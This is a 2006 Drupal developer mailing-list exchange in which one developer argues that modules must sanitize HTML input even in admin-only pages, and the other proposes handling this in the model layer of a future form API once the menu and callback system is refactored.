On 12 May 2006, at 9:37 AM, Bèr Kessels wrote:
I was not referring to the filtering system itself. The part that filters nodes and comments works pretty well IMO. I was referring to things like where a module collects Foo (outside the node/comment system) as input and e-g prints them in a list. If that module developer forgets to call the proper filters for the Foos we have a security hole. Views module, e.g. does this very well, but imagine a module like that with all the input not sanitizing. Yes, those places are only accessible by admins. But no: having something in the admin area is not a reason for not sanitizing HTML.
Yup, then i believe the 'model' part of fapi 2.0 is the best place to do it. We can't even start working on that until the menu / callback system is refactored/fixed. I'll write up a spec about what I'd like to see happen to the menu system. -- Adrian Rossouw Drupal developer and Bryght Guy http://drupal.org | http://bryght.com